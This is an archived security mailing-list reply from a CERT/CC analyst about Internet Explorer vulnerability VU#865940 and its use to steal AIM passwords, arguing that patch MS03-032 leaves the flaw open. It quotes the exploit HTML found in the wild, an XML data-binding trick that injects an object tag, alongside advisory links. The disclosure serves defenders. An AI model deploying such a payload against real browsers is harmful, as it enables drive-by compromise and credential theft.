<<< Date Index >>>     <<< Thread Index >>>

RE: [Fwd: Re: AIM Password theft] VU#865940



-----BEGIN PGP SIGNED MESSAGE-----

Thor Larholm <thor@xxxxxxxx> writes:

> This is just a simple exploit utilizing the Object Data vulnerability
> discovered by Drew Copley, coupled with the GreyMagic no-script HTML
> rendering as demonstrated earlier on this list and others by jelmer.
> 
> Tell your user to go install MS03-032, which he obviously did not do as
> MS03-032 patches this vulnerability. MS03-032 was released on August 20
> and you can find it at
> 
> http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

At the present, the patch for MS03-032 breaks one of at least three
exploit techniques.  The patch does not resolve the vulnerability.
MS03-032 acknowledges this.  I have seen several examples of this
vulnerability being exploited in the wild.

> www.haxr.org contains the following HTML code (with <> replaced to []):
> 
> [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
> [xml id="oExec"]
> [security]
> [counter]
> [![CDATA[
> [object data=tracker.php][/object]
> ]]]
> [/counter]
> [/security]
> [/xml]

In particular, the current MS03-32 patch doesn't account for an HTML
document created via XML/data binding:

  <http://greymagic.com/adv/gm001-ie/>

The patch also does not account for an HTML document created via
script:

  <http://www.securityfocus.com/archive/1/336616>

Vulnerability Note VU#865940:

  <http://www.kb.cert.org/vuls/id/865940>


Regards,

  - Art


             Art Manion  --  CERT Coordination Center
    <http://www.cert.org/>   <cert@xxxxxxxx>   +1 412-268-7090
         E0 1E DF F5 FC 76 00 32  77 8F 25 F7 B0 2E 2C 27


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----